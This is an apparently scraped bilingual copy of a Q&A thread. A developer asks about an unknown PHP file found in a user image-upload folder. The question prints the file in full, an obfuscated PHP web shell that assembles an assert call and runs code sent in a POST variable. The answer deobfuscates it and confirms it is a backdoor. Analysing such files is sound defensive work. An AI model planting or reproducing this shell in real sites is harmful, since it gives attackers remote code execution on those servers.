[英]Unknown PHP file in my upload folder, isn't malicious code?
Recently i found out my project got hacked and i found a script in my images folder which where a directory for user to upload their images (using file input). 最近,我发现我的项目被黑客入侵,并在我的图像文件夹中找到了一个脚本,该脚本在其中有一个目录供用户上传其图像(使用文件输入)。 Here is the script that i found in the directory.
这是我在目录中找到的脚本。
errot_db.php errot_db.php
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
This code hides the following statement: 此代码隐藏以下语句:
@assert ($_POST[025]);
Which means it'll execute the PHP code send in the POST variable "025". 这意味着它将执行在POST变量“ 025”中发送的PHP代码。 So, yes, this is indeed a backdoor!
所以,是的,这确实是一个后门! I recommend asking on security.stackexchange.com for help on how to properly deal with the fallout.
我建议在security.stackexchange.com上寻求有关如何正确处理辐射的帮助。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.